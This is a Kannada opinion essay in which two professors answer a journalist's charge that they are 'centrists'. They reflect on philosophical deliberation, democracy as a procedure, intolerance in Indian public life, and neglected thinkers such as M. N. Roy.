ಸಿದ್ಧಾಂತಿಗಳ ರಾದ್ಧಾಂತ: ಒಂದು ಸ್ವ-ವಿಮರ್ಶೆ

ಇತ್ತೀಚೆಗೆ ಮಂಗಳೂರಿನಲ್ಲಿ ನಡೆದ ಬಿ.ವಿ.ಕಕ್ಕಿಲ್ಲಾಯ ಶತಾಬ್ದಿ ಸಮಾರಂಭದಲ್ಲಿ ಭಾಗವಹಿಸಿದ್ದ ಪತ್ರಕರ್ತ ದಿನೇಶ್ ಅಮೀನ್ ಮಟ್ಟು ಅವರು ಪ್ರೊ.ರಾಜಾರಾಮ ತೋಳ್ಪಾಡಿ ಮತ್ತು ಪ್ರೊ.ನಿತ್ಯಾನಂದ ಶೆಟ್ಟಿ ಅವರನ್ನು ‘ನಡುಪಂಥೀಯರು’ ಎಂದು ದೂಷಿಸಿದ್ದರು. ಫೇಸ್ಬುಕ್ಕಿನಲ್ಲಿ ಇದೇ ವಿಚಾರ ಪ್ರಸ್ತಾಪವಾಗಿ ದಿನೇಶ್, ‘ಈ ತಥಾಕಥಿತ ಮಧ್ಯಪಂಥೀಯ ಅವಳಿಗಳ ಪ್ರತಿಕ್ರಿಯೆಗಾಗಿ ಕಾಯುತ್ತಿದ್ದೇನೆ, ಚಡ್ಡಿ ಜಾರಿಸಲು’ ಎಂದು ಆಹ್ವಾನಿಸಿದ್ದರು. ರಾಜಾರಾಮ ಮತ್ತು ನಿತ್ಯಾನಂದ ಅವರು ತಮ್ಮ ಮೇಲಿನ ಟೀಕೆಗೆ ಈ ಲೇಖನದಲ್ಲಿ ತಾತ್ವಿಕ ನೆಲೆಗಟ್ಟಿನಲ್ಲಿ ಪ್ರತಿಕ್ರಿಯಿಸುತ್ತಾ ತಮ್ಮನ್ನು ‘ವಿಮರ್ಶಾತ್ಮಕ ಎಡಪಂಥೀಯರು’ ಎಂದು ಗುರುತಿಸಿಕೊಂಡಿದ್ದಾರೆ. ವ್ಯಕ್ತಿಗತ ನಿಂದನೆಗೆ ಹೊರತಾದ ಸೈದ್ಧಾಂತಿಕ ಸಂವಾದಕ್ಕೆ, ಆರೋಗ್ಯಕಾರಿ ಚಿಂತನೆಗೆ ಸಮಾಜಮುಖಿ ಮುಕ್ತ ವೇದಿಕೆಯಾಗಿದೆ. ಚರ್ಚೆ ಮುಂದುವರಿಸಬಹುದು.

ಇಂದಿನ ನಮ್ಮ ಯುಗ ಆಕ್ರಮಣ ಹಾಗೂ ಅತಿಕ್ರಮಣಗಳ ಯುಗ. ಮತಾಂಧ ಹಠಮಾರಿತನದ ಬಹುರೂಪಗಳಿಂದ ಬಳಲುತ್ತಿರುವ ಇಂದಿನ ಪ್ರಕ್ಷುಬ್ಧ ಸ್ಥಿತಿಯಲ್ಲಿ ನಾವು ವಿಚಾರಶೀಲತೆಯಿಂದ ಕಟ್ಟಬಹುದಾದ, ಮೌಲಿಕವಾಗಿ ಸಿರಿವಂತವಾದ ಸಮಾಜದ ಕಲ್ಪನೆಯನ್ನೇ ಮರೆತುಬಿಟ್ಟಿದ್ದೇವೆ. ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿ, ತತ್ವಜ್ಞಾನೀಯ ಜಿಜ್ಞಾಸೆಯ ಚರಿತ್ರೆ, ಅದರ ಮಹತ್ವ ಹಾಗೂ ಅದು ಒಳಗೊಳ್ಳುವ ಕ್ರಿಯಾಚರಣೆಯ ವಿಧಿವಿಧಾನಗಳ ಕುರಿತು ನಾವು ಚಿಂತನೆ ನಡೆಸಬೇಕಾದ ಅಗತ್ಯವಿದೆ. ಪ್ರಸ್ತುತ ಲೇಖನ, ನಾವು ಸರಳವಾಗಿ ಮತ್ತು ನಿಸ್ಸಂದಿಗ್ಧವಾಗಿ ಬಳಸುವ ಸಂವಾದ, ಸಂಭಾಷಣೆ, ವಿಚಾರ-ವಿನಿಮಯ ಹಾಗೂ ಚಿಂತನ-ಮಂಥನಗಳೆನ್ನುವ ಪದಪುಂಜಗಳ ಹಿಂದಿನ ಅರಿವನ್ನು ಗುರುತಿಸಲು ಯತ್ನಿಸುತ್ತದೆ.

ತತ್ವಜ್ಞಾನದ ಪಾಶ್ಚಿಮಾತ್ಯ ಇತಿಹಾಸದಲ್ಲಿ ವಿಚಾರಶೀಲ ಸಂವಾದ  (deliberation) ಎನ್ನುವ ಬೌದ್ಧಿಕ ವಿದ್ಯಮಾನಕ್ಕೆ ಒಂದು ಸುದೀರ್ಘ ಚರಿತ್ರೆ ಇದೆ. ಈ ಚರಿತ್ರೆ ಸಾಕ್ರಟಿಸ್ ಪೂರ್ವದ ಗ್ರೀಕ್ ತತ್ವಜ್ಞಾನದಿಂದ ಆರಂಭಗೊಂಡು ಇಂದಿನವರೆಗೂ ಅವ್ಯಾಹತವಾಗಿ ಹರಿದುಕೊಂಡು ಬಂದಿದೆ. ಬಹುಶಃ, ಗ್ರೀಕ್ ತತ್ವಜ್ಞಾನಿ ಸಾಕ್ರಟೀಸ್ ತನ್ನ ಸಮಕಾಲೀನ ಇತರ ವಿಚಾರಪಂಥಗಳ ಜೊತೆಗೆ ನಡೆಸಿದ ತತ್ವಜ್ಞಾನೀಯ ಸಂವಾದವೇ ಪಾಶ್ಚಿಮಾತ್ಯ ತತ್ವ ಚಿಂತನೆಗೆ ಬುನಾದಿಯನ್ನು ಹಾಕಿತು ಎನ್ನಬಹುದು. ತದನಂತರದಲ್ಲಿ, ಪ್ಲೇಟೋ ಮತ್ತು ಅರಿಸ್ಪಾಟಲರ ಕಾಲದಿಂದ ಆರಂಭಗೊಂಡು ಆಧುನಿಕ ಯುರೋಪಿನ ವಿವಿಧ ಬೌದ್ಧಿಕ ಕಾಲಘಟ್ಟಗಳಲ್ಲಿ ಸಂವಾದದ ನೆಲೆಯ ಚಿಂತನ- ಮಂಥನಗಳು ನಡೆದಿವೆ. ಈ ಚಿಂತನ-ಮಂಥನಗಳ ಚರಿತ್ರೆಯಲ್ಲಿ ಅನೇಕ ಬಗೆಯ ತಾತ್ವಿಕ ದರ್ಶನಗಳು, ಸೈದ್ಧಾಂತಿಕ ನಿಲುವುಗಳು ರೂಪುಗೊಂಡಿವೆ. ಆಧುನಿಕ ಯುರೋಪಿನ ಈ ವಿವಿಧ ಕಾಲಘಟ್ಟಗಳಲ್ಲಿಯೇ ನಾವಿಂದು ಸಲೀಸಾಗಿ ಬಳಸುವ ಹಾಗೂ ಗಾಢವಾಗಿ ಪ್ರಭಾವಿತಗೊಂಡಿರುವ ರಾಷ್ಟ್ರವಾದ, ಪ್ರಜಾತಂತ್ರ, ಸಾಂವಿಧಾನಿಕ ಆಡಳಿತ, ಸೆಕ್ಯುಲರ್‍ವಾದ ಮತ್ತು ಅಭಿವೃದ್ಧಿಗಳೆನ್ನುವ ವಿಚಾರ ಶಬ್ಧಗಳು ರೂಪುಗೊಂಡದ್ದು.

ಲಿಬರಲ್‍ವಾದ, ಆದರ್ಶವಾದ, ಸಮಾಜವಾದ, ಮಾಕ್ರ್ಸ್‍ವಾದ, ಸಮುದಾಯವಾದ ಹೀಗೆ ಅನೇಕ ಸಿದ್ಧಾಂತಗಳು ಮೊಳಕೆಯೊಡೆದು, ರೂಪ ತಳೆದು ದೀರ್ಘಕಾಲಾವಧಿಯಲ್ಲಿ ಅನೇಕ ಕವಲುಗಳಾಗಿ ಇಲ್ಲಿ ಹರಡಿಕೊಂಡಿವೆ.

ಆಧುನಿಕ ಯುರೋಪಿನ ಈ ವಿವಿಧ ಕಾಲಘಟ್ಟಗಳಲ್ಲಿಯೇ ನಾವಿಂದು ಸಲೀಸಾಗಿ ಬಳಸುವ ಹಾಗೂ ಗಾಢವಾಗಿ ಪ್ರಭಾವಿತಗೊಂಡಿರುವ ರಾಷ್ಟ್ರವಾದ, ಪ್ರಜಾತಂತ್ರ, ಸಾಂವಿಧಾನಿಕ ಆಡಳಿತ, ಸೆಕ್ಯುಲರ್‍ವಾದ ಮತ್ತು ಅಭಿವೃದ್ಧಿಗಳೆನ್ನುವ ವಿಚಾರ ಶಬ್ದಗಳು ರೂಪುಗೊಂಡದ್ದು ಪಾಶ್ಚಿಮಾತ್ಯ ಬೌದ್ಧಿಕ ಚರಿತ್ರೆಯ ಈ ವಿಶ್ವರೂಪದಲ್ಲಿ ಅನೇಕ ಗುರು ಶಿಷ್ಯ ಪರಂಪರೆಗಳನ್ನೂ ನಾವು ಕಾಣಬಹುದು.

ಪಾಶ್ಚಿಮಾತ್ಯ ಚಿಂತನ ಪರಂಪರೆಗಳಲ್ಲಿ ನಿರಂತರ ಸಂವಾದ, ವಾದ-ಪ್ರತಿವಾದ ಹಾಗೂ ಚಿಂತನ-ಮಂಥನಗಳ ಮುಖೇನ ವಿಭಿನ್ನ ಪ್ರಕೃತಿಯ ತಾತ್ವಿಕ ದರ್ಶನಗಳು ಹಾಗೂ ಸಿದ್ಧಾಂತಗಳು ರೂಪುಗೊಂಡಿರುವುದನ್ನು ನಾವು ಗಮನಿಸಬಹುದು. ಲಿಬರಲ್‍ವಾದ, ಆದರ್ಶವಾದ, ಸಮಾಜವಾದ, ಮಾಕ್ರ್ಸ್‍ವಾದ, ಸಮುದಾಯವಾದ ಹೀಗೆ ಅನೇಕ ಸಿದ್ಧಾಂತಗಳು ಮೊಳಕೆಯೊಡೆದು, ರೂಪ ತಳೆದು ದೀರ್ಘಕಾಲಾವಧಿಯಲ್ಲಿ ಅನೇಕ ಕವಲುಗಳಾಗಿ ಇಲ್ಲಿ ಹರಡಿಕೊಂಡಿವೆ. ಹಾಗೆಯೇ, ತತ್ವ-ಸಿದ್ಧಾಂತಗಳ ಈ ಸಂಕೀರ್ಣ ಚರಿತ್ರೆಯಲ್ಲಿ ಆಮೂಲಾಗ್ರವಾದ ರೂಪ ಪರಿವರ್ತನೆಗಳೂ ಸಂಭವಿಸಿವೆ.

ಮಾಕ್ರ್ಸ್‍ವಾದವೆನ್ನುವ ಅತ್ಯಂತ ಸಂಕೀರ್ಣವಾದ ಬಹುರೂಪೀ ತಾತ್ವಿಕ ವಿದ್ಯಮಾನದಲ್ಲಿ ತಮ್ಮನ್ನು ಮಾಕ್ರ್ಸ್‍ವಾದಿಗಳೆಂದು ಗುರುತಿಸಿಕೊಂಡ ಅನೇಕ ಚಿಂತಕರುಗಳ ನಡುವೆ ಪ್ರಮುಖವಾದ ಮತ್ತು ತಾತ್ವಿಕವಾಗಿ ಬಗೆಹರಿಸಲಾಗದ ಭಿನ್ನಮತಗಳಿವೆ.

ಪಾಶ್ಚಿಮಾತ್ಯ ಚಿಂತನೆಯ ಇತಿಹಾಸವೆಂದರೆ ಗುರು-ಶಿಷ್ಯ ಪರಂಪರೆಗಳು ಚಿಂತನೆಗಳನ್ನು ಮತ್ತು ಚಿಂತನಕ್ರಮಗಳನ್ನು ಸರಳವಾಗಿ ಹಸ್ತಾಂತರಿಸಿದ ಕಥೆಯಲ್ಲ. ಗ್ರೀಕ್ ತತ್ವಜ್ಞಾನದ ಇತಿಹಾಸದಲ್ಲಿ ಗುರು-ಶಿಷ್ಯರೆಂದೇ ಪ್ರಖ್ಯಾತರಾದ ಪ್ಲೇಟೋ ಮತ್ತು ಅರಿಸ್ಟಾಟಲ್ ನಡುವೆ ತಾತ್ವಿಕವಾದ ಭಿನ್ನಮತಗಳಿದ್ದವು. ಅವುಗಳ ನಡುವೆಯೂ ಅರಿಸ್ಟಾಟಲ್ ಪ್ಲೇಟೋನ ಚಿಂತನ ಪರಂಪರೆಯನ್ನು ಮುಂದುವರಿಸುತ್ತಾನೆ ಮತ್ತು ಅದಕ್ಕೆ ತಾತ್ವಿಕ ಪ್ರಖರತೆಯನ್ನು ಒದಗಿಸುತ್ತಾನೆ. ಅಂತೆಯೇ, ಪ್ರಯೋಜನವಾದಿ ನೆಲೆಯ ಲಿಬರಲ್‍ವಾದದ ಪ್ರಖ್ಯಾತ ಗುರು-ಶಿಷ್ಯರುಗಳಾದ ಜರೆಮೀ ಬೆಂಥಮ್ ಮತ್ತು ಸ್ಟುವರ್ಟ್ ಮಿಲ್‍ರ ನಡುವೆಯೂ ಅಗಾಧವಾದ ಮತಬೇಧಗಳಿದ್ದವು. ಹಾಗಿದ್ದೂ, ಬೆಂಥಮ್‍ನ ಪ್ರಯೋಜನವಾದಕ್ಕೆ ನೈತಿಕ ಬೆನ್ನೆಲುಬನ್ನು ಒದಗಿಸುವ ಪ್ರಯತ್ನವನ್ನು ಮಿಲ್ ಮಾಡುತ್ತಾನೆ. ಮಾಕ್ರ್ಸ್‍ವಾದವೆನ್ನುವ ಅತ್ಯಂತ ಸಂಕೀರ್ಣವಾದ ಬಹುರೂಪೀ ತಾತ್ವಿಕ ವಿದ್ಯಮಾನದಲ್ಲಿ ತಮ್ಮನ್ನು ಮಾಕ್ರ್ಸ್‍ವಾದಿಗಳೆಂದು ಗುರುತಿಸಿಕೊಂಡ ಅನೇಕ ಚಿಂತಕರುಗಳ ನಡುವೆ ಪ್ರಮುಖವಾದ ಮತ್ತು ತಾತ್ವಿಕವಾಗಿ ಬಗೆಹರಿಸಲಾಗದ ಭಿನ್ನಮತಗಳಿವೆ. ಈ ಭಿನ್ನಮತಗಳ ಹೊರತಾಗಿಯೂ ಮಾರ್ಕ್ಸ್‍ವಾದದ ಒಳಗೆ ಚೈತನ್ಯಶೀಲ ಸಂವಾದ ಸಂಭವಿಸುತ್ತಿರುವುದರಿಂದ ಅದು ಇನ್ನೂ ಕೂಡ ಜೀವಂತವಾದ ತತ್ವವಾಗಿ ಮುಂದುವರಿದಿದೆ. ಒಟ್ಟಿನಲ್ಲಿ, ಸಂವಾದಗಳಿಂದ ರೂಪುಗೊಳ್ಳುವ ತಾತ್ವಿಕ ದರ್ಶನಗಳು ಮತ್ತು ಸೈದ್ಧಾಂತಿಕ ನಿಲುವುಗಳು ಉರುಟಾದ, ನುಣುಪಾದ ವಸ್ತುಗಳಾಗಿರದೆ ಪರಸ್ಪರ ತಿಕ್ಕಾಟಗಳಲ್ಲಿ ರೂಪು ತಳೆಯುವ ಸಂಕೀರ್ಣ ವಿದ್ಯಮಾನಗಳಾಗಿವೆ. ಇಲ್ಲಿ ವಿಚಾರಗಳು ತಲೆಮಾರಿನಿಂದ ತಲೆಮಾರಿಗೆ ವರ್ಗಾವಣೆಗೊಳ್ಳುವುದಿಲ್ಲ. ಬದಲಾಗಿ, ಅವು ವಿಭಿನ್ನ ಚಿಂತಕರುಗಳ ಸೃಷ್ಟಿಶೀಲತೆಯಲ್ಲಿ ಮರುಪ್ರತಿಫಲನಗೊಳ್ಳುತ್ತವೆ.

ಆದ್ದರಿಂದ, ಪ್ರಜಾತಂತ್ರದಲ್ಲಿ ಸಾಧನೆಗಿಂತ ಸಾಧನ ಮುಖ್ಯವಾಗುತ್ತದೆ. ಶ್ರೇಷ್ಠವಾದ ಉದ್ದೇಶ ಸಾಧನೆಗೆ ಸೂಕ್ತವಾದ ಅಥವಾ ನ್ಯಾಯ ಸಮ್ಮತವಾದ ಸಾಧನಗಳನ್ನು ಬಳಸುವ ಕ್ರಿಯಾಚರಣೆಯ ಸೂತ್ರಗಳನ್ನೇ ನಾವು ಪ್ರಜಾತಂತ್ರವೆಂದು ನಿರ್ವಚಿಸಬಹುದು.

ಮೇಲಿನ ಈ ಎಲ್ಲ ಮಾತುಗಳನ್ನು ಒಂದು ವಿಷಯವನ್ನು ಸ್ಪಷ್ಟಪಡಿಸಲು ಹೇಳಲಾಗಿದೆ. ಅದು, ಯಾವುದೇ ತತ್ವಜ್ಞಾನೀಯ ಇತಿಹಾಸದಲ್ಲಿ ನಿಹಿತವಾಗಿರುವ ಕರ್ಷಣೆ ಮತ್ತು ಘರ್ಷಣೆಗಳಿಗೆ ಸಂಬಂಧಿಸಿದ್ದು ಹಾಗೂ ಇವುಗಳಿಂದ ರೂಪುಗೊಳ್ಳುವ ಸಹಮತ-ಭಿನ್ನಮತಗಳಿಗೆ ಸಂಬಂಧಿಸಿದ್ದು. ಸಂವಾದವೆಂದರೆ ಇಬ್ಬರು ವ್ಯಕ್ತಿಗಳು ಎದುರಾ-ಬದುರು ಕುಳಿತು ತಮ್ಮ ವಾದಗಳನ್ನು ಅಚ್ಚುಕಟ್ಟಾಗಿ ಮಂಡಿಸುವುದೆಂದಲ್ಲ. ಅದು ಚರಿತ್ರೆಯ ಸಂಕೀರ್ಣತೆಯಲ್ಲಿ ರಾಜಕೀಯ, ಸಾಮಾಜಿಕ ಹಾಗೂ ಸಾಂಸ್ಕೃತಿಕ ಏರುಪೇರುಗಳ ಸಂದಿಗ್ಧತೆಯಲ್ಲಿ ಸಂಭವಿಸುವ ಕ್ಲಿಷ್ಟವಾದ ವಿದ್ಯಮಾನ. ಆದ್ದರಿಂದ, ಸಂವಾದವೆಂದರೇನು.? ಅರ್ಥಪೂರ್ಣವಾದ ಸಂಭಾಷಣೆಗಳು ಸಂಭವಿಸುವುದು ಹೇಗೆ.?, ಮೂಲಭೂತವಾಗಿಯೇ ಪರಸ್ಪರ ವಿರೋಧಾತ್ಮಕ ಚಿಂತನೆಯ ನೆಲೆಗಟ್ಟನ್ನು ಹೊಂದಿರುವ ಭಿನ್ನ ಸಿದ್ಧಾಂತಗಳು ಸಂವಾದಕ್ಕೆ ತೊಡಗುವುದೆಂದರೆ ಏನು.? ಸಂವಾದಗಳ ಮೂಲಕ ಸಹಮತಗಳು ಹೇಗೆ ರೂಪುಗೊಳ್ಳುತ್ತವೆ.? ಭಿನ್ನಮತಗಳು ಹೇಗೆ ಉದ್ಭವಿಸುತ್ತವೆ.? ಭಿನ್ನಭಿನ್ನ ಕಾಲಗಳಲ್ಲಿ ರೂಪುಗೊಳ್ಳುವ ಸಹಮತಗಳ ಸ್ವರೂಪವೇನು.? ಭಿನ್ನಮತಗಳ ಸ್ಥಾನಮಾನವೇನು.? ಅವುಗಳನ್ನು ನಿರ್ವಹಿಸುವ ಬಗೆಗಳಾವುವು.? ಎನ್ನುವುದರ ಕುರಿತು ಸಮಕಾಲೀನ ಪಾಶ್ಚಿಮಾತ್ಯ ಚಿಂತನೆಯಲ್ಲಿ ಸಾಕಷ್ಟು ಚರ್ಚೆಗಳು ನಡೆದಿವೆ. ಈ ಚರ್ಚೆಗಳ ಸಾರಾಂಶವನ್ನೇ ಇಂದು ನಾವು ಪ್ರಜಾತಂತ್ರ ಎಂದು ಕರೆಯುತ್ತೇವೆ.

ಪ್ರಜಾತಂತ್ರವನ್ನು ನಾವು ತತ್ತ್ವಜ್ಞಾನವೆಂದು ಪರಿಗಣಿಸುವ ಜೊತೆಜೊತೆಗೆ ಅದೊಂದು ಕ್ರಿಯಾಚರಣೆಯ ಕಾರ್ಯಸೂಚಿ ಎಂಬುದನ್ನೂ ನೆನಪಿಟ್ಟುಕೊಳ್ಳಬೇಕು. ಮಾತುಕತೆಗಳು ಹೇಗೆ ನಡೆಯಬೇಕು.? ಮಾತುಕತೆಗಳ ಫಲಿತಾಂಶವಾಗಿ ನಿರ್ಣಯಗಳನ್ನು ಹೇಗೆ ತೆಗೆದುಕೊಳ್ಳಬೇಕು.? ನಿರ್ಣಯಗಳನ್ನು ಸಾರ್ವಜನಿಕರ ಹಿತಾಸಕ್ತಿಗಳಿಗೆ ಅನುಗುಣವಾಗಿ ಹೇಗೆ ಕಾರ್ಯಗತಗೊಳಿಸಬೇಕು.? ಎನ್ನುವುದರ ಕುರಿತು ಪ್ರಜಾತಂತ್ರ ಸ-ವಿವರವನ್ನು ಮುಂದಿಡುತ್ತದೆ. ಆದ್ದರಿಂದ, ಪ್ರಜಾತಂತ್ರದಲ್ಲಿ ಸಾಧನೆಗಿಂತ ಸಾಧನ ಮುಖ್ಯವಾಗುತ್ತದೆ. ಶ್ರೇಷ್ಠವಾದ ಉದ್ದೇಶ ಸಾಧನೆಗೆ ಸೂಕ್ತವಾದ ಅಥವಾ ನ್ಯಾಯ ಸಮ್ಮತವಾದ ಸಾಧನಗಳನ್ನು ಬಳಸುವ ಕ್ರಿಯಾಚರಣೆಯ ಸೂತ್ರಗಳನ್ನೇ ನಾವು ಪ್ರಜಾತಂತ್ರವೆಂದು ನಿರ್ವಚಿಸಬಹುದು.

ಇದು ಭಾರತದ ಆಧುನಿಕ ಚಿಂತನ ಪರಂಪರೆಗಳಿಗೆ ಮಾತ್ರ ಸೀಮಿತಗೊಂಡಿಲ್ಲ. ನಮ್ಮ ದೇಶದ ಸುದೀರ್ಘ ಇತಿಹಾಸದ ಅನೇಕ ಮಹತ್ತ್ವದ ಅಧ್ಯಾಯಗಳನ್ನು ನಾವು ಗುರುತಿಸುವ ಗೋಜಿಗೇ ಹೋಗಿಲ್ಲ.

ಭಾರತ, ತನ್ನ ವಿಶಿಷ್ಟವಾದ ರಾಷ್ಟ್ರೀಯ ಹೋರಾಟದ ಮೂಲಕ ರಾಜಕೀಯ ಸ್ವಾತಂತ್ರ್ಯ, ಸಾಂವಿಧಾನಿಕ ಸರಕಾರ ಮತ್ತು ಪ್ರಜಾತಂತ್ರಗಳನ್ನು ತನ್ನ ಸ್ವ-ನಿರ್ವಹಣೆಯ ಸೂತ್ರಗಳನ್ನಾಗಿ ಅಳವಡಿಸಿಕೊಂಡಿದೆ. ಹಾಗಿದ್ದರೂ, ಈ ಸೂತ್ರಗಳು ಸಾರ್ವಜನಿಕ ಜೀವನದಲ್ಲಿ ಆಳವಾಗಿ ನೆಲೆಯೂರಿಲ್ಲ. ನಮ್ಮ ಸಾರ್ವಜನಿಕ ಬದುಕು ಇನ್ನೂ ಅನೇಕ ಬಗೆಯ ಅ-ಪ್ರಜಾತಾಂತ್ರಿಕವಾದ, ಹಿಂಸಾತ್ಮಕವಾದ ಹಾಗೂ ವಿಘಟನಕಾರಿಯಾದ ವಿದ್ಯಮಾನಗಳಿಂದ ವಿಜೃಂಭಿಸುತ್ತಿದೆ. ಭಾರತದ ಉದ್ಘೋಷಿತ ರಾಜಕೀಯ ವ್ಯವಸ್ಥೆ ಹಾಗೂ ಸಾರ್ವಜನಿಕ ಬದುಕಿನ ನಡುವೆ ಇರುವ ಅಗಾಧವಾದ ಕಂದಕಗಳ ಕುರಿತು ಶೈಕ್ಷಣಿಕವಾಗಿ ಮೌಲಿಕವಾದ ಅನೇಕ ಅಧ್ಯಯನಗಳು ನಡೆದಿವೆ. ಅವುಗಳ ಕುರಿತು ನಾವು ಇಲ್ಲಿ ಚರ್ಚೆ ನಡೆಸುವುದಿಲ್ಲ. ಬದಲಾಗಿ, ಇಂದಿನ ನಮ್ಮ ಸಾರ್ವಜನಿಕ ಜೀವನದಲ್ಲಿ ವಿಚಾರಶೀಲತೆಯ ಗೈರು ಹಾಜರಿಯಿಂದಾಗಿ ಮುನ್ನೆಲೆಗೆ ಬಂದಿರುವ ಅಸಹನೆಯ ಅಸಂಖ್ಯ ರೂಪಗಳ ಅಪಾಯಗಳ ಕುರಿತು ಚಿಂತನೆ ನಡೆಸುವುದಷ್ಟೇ ನಮ್ಮ ಉದ್ದೇಶವಾಗಿದೆ. ಅಂತೆಯೇ, ಈ ಅಪಾಯಗಳ ಸಮಕ್ಷಮದಲ್ಲಿ ನಾವು ನಿರ್ವಹಿಸಬೇಕಾದ ಕರ್ತವ್ಯಗಳ ಕುರಿತೂ ಚಿಂತಿಸಬೇಕಾಗಿದೆ.

ಅಸಹನೆಯ ಭೀಕರ ಪರಿಸ್ಥಿತಿಗೆ ಅನೇಕ ಸಂಕೀರ್ಣ ಹಾಗೂ ನಿರ್ದಿಷ್ಟ ಕಾರಣಗಳಿವೆ. ಅವುಗಳಲ್ಲಿ ನಮ್ಮ ಬಹುರೂಪೀ ಬೌದ್ಧಿಕ ಪರಂಪರೆಯ ಅನೇಕ ಮಹತ್ತ್ವದ ಮೈಲಿಗಲ್ಲುಗಳನ್ನು ನಾವು ಕೆಲವೊಮ್ಮೆ ಪ್ರಜ್ಞಾಪೂರ್ವಕವಾಗಿ, ಇನ್ನು ಕೆಲವೊಮ್ಮೆ ನಮಗರಿವಿಲ್ಲದೆ ಬದಿಗೆ ಸರಿಸಿರುವುದೂ ಬಹುಶಃ ಪ್ರಮುಖ ಕಾರಣವೆಂದು ನಮಗನಿಸುತ್ತದೆ. ಈ ವಿಸ್ಮೃತಿಯ ಹರಹು ವಿಶಾಲವಾದದ್ದು ಮತ್ತು ಆಘಾತಕಾರಿಯಾದದ್ದು. ಇದು ಭಾರತದ ಆಧುನಿಕ ಚಿಂತನ ಪರಂಪರೆಗಳಿಗೆ ಮಾತ್ರ ಸೀಮಿತಗೊಂಡಿಲ್ಲ. ನಮ್ಮ ದೇಶದ ಸುದೀರ್ಘ ಇತಿಹಾಸದ ಅನೇಕ ಮಹತ್ತ್ವದ ಅಧ್ಯಾಯಗಳನ್ನು ನಾವು ಗುರುತಿಸುವ ಗೋಜಿಗೇ ಹೋಗಿಲ್ಲ. ನಮಗೆ ಎದುರಾದ ಚಿಂತನೆಗಳಿಗೆ ಹಾಗೂ ಚಿಂತಕರಿಗೆ ಹಣೆಪಟ್ಟಿಗಳನ್ನು ಅಂಟಿಸಿ ಅವರನ್ನು ಅಥವ ಅವುಗಳನ್ನು ನಿಂದಿಸುವ/ಹಂಗಿಸುವ ಕೆಲಸಗಳನ್ನು ನಾವು ಅಚ್ಚುಕಟ್ಟಾಗಿ ಮಾಡುತ್ತಿದ್ದೇವೆ.

ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಅಳಿಸಲ್ಪಟ್ಟ ಅಥವ ಅಳಿಸಿ ಹೋಗಿರುವ ಆಧುನಿಕ ಭಾರತದ ಚಿಂತನೆಯ ಕೆಲವು ನಿದರ್ಶನಗಳನ್ನಷ್ಟೇ ನಾವಿಲ್ಲಿ ಮುಂದಿಡುತ್ತೇವೆ. ಅವರಲ್ಲಿ ಎಂ ಎನ್ ರಾಯ್, ನರೇಂದ್ರದೇವ ಮತ್ತು ಅರವಿಂದೊ ಅವರನ್ನು ಮುಖ್ಯರೆಂದು ನಾವು ಪರಿಗಣಿಸುತ್ತೇವೆ.

ಅಂದರೆ ನಾವು ಒಂದೋ ಸಂಪೂರ್ಣ ಆರಾಧನೆ ಇಲ್ಲವೇ ಸಮಗ್ರ ನಿರಾಕರಣೆಗಳೆಂಬ ಎರಡು ತುದಿಗಳ ನಡುವೆ ಜೀಕುತ್ತ ಇರುತ್ತೇವೆಯೇ ಹೊರತು ಪ್ರತಿಯೊಂದನ್ನೂ ವಿಮರ್ಶಾತ್ಮಕವಾಗಿ ತೂಗಿ ನೋಡಬೇಕೆಂಬ ಪರಿವೆ ನಮಗೆ ಇದ್ದಂತಿಲ್ಲ. ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಅಳಿಸಲ್ಪಟ್ಟ ಅಥವ ಅಳಿಸಿ ಹೋಗಿರುವ ಆಧುನಿಕ ಭಾರತದ ಚಿಂತನೆಯ ಕೆಲವು ನಿದರ್ಶನಗಳನ್ನಷ್ಟೇ ನಾವಿಲ್ಲಿ ಮುಂದಿಡುತ್ತೇವೆ. ಅವರಲ್ಲಿ ಎಂ ಎನ್ ರಾಯ್, ನರೇಂದ್ರದೇವ ಮತ್ತು ಅರವಿಂದೊ ಅವರನ್ನು ಮುಖ್ಯರೆಂದು ನಾವು ಪರಿಗಣಿಸುತ್ತೇವೆ.

ನಾವು ಮುಂದಿಡುವ ಮೊದಲನೆಯ ನಿದರ್ಶನ, ಆರಂಭದಲ್ಲಿ ಭಾವಶೀಲ ರಾಷ್ಟ್ರವಾದಿಯಾಗಿ, ನಂತರದಲ್ಲಿ ಮಾಕ್ರ್ಸ್‍ವಾದಿಯಾಗಿ, ಕೊನೆಯಲ್ಲಿ ನವಮಾನವತಾವಾದಿಯಾಗಿ ಬದಲಾದ ಈ ದೇಶದ ಪ್ರಪ್ರಥಮ ಎಡಪಂಥೀಯವಾದಿ ಎಂದು ಕರೆಯಬಹುದಾದ ಮಾನವೇಂದ್ರನಾಥ್ ರಾಯ್ ಅವರದ್ದು. ನರೇಂದ್ರನಾಥ್ ಭಟ್ಟಾಚಾರ್ಯ ಎನ್ನುವ ತನ್ನ ಮೂಲ ಹೆಸರನ್ನು ಮಾನವೇಂದ್ರನಾಥ್ ರಾಯ್ ಎಂದು ಬದಲಾಯಿಸಿಕೊಂಡ ಇವರು ರಷ್ಯಾ ಕಾಂತ್ರಿಯ ಹರಿಕಾರ ಲೆನಿನ್‍ನ ಆಪ್ತ ಗೆಳೆಯ. ಸ್ವತಃ ಲೆನಿನ್ ರಾಯ್‍ರವರನ್ನು ವಸಾಹತು ಪ್ರಶ್ನೆಗಳಿಗೆ ಸಂಬಂಧಿಸಿದಂತೆ ತನ್ನ ಪ್ರಮುಖ ಸಲಹಾಗಾರನನ್ನಾಗಿ ಪರಿಗಣಿಸಿದ್ದ. ಅಂತೆಯೇ, ಭಾರತದ ಸಮಸ್ಯೆಗಳಿಗೆ ಸಂಬಂಧಿಸಿದಂತೆ ತನ್ನ ವಿಚಾರಗಳು ರಾಯ್‍ಗಿಂತ ಬೇರೆಯಾಗಿದ್ದರೂ ‘ಆತನ ನಿರ್ದೇಶನದಂತೆ ಭಾರತದಲ್ಲಿ ಕಮ್ಯುನಿಸ್ಟ್ ಆಂದೋಲನ ಸಂಘಟಿಸಬೇಕು’ ಎಂದು ಲೆನಿನ್ ಭಾರತದ ತನ್ನ ಸಂಗಾತಿಗಳಿಗೆ ತಾಕೀತು ಮಾಡಿದ್ದ.

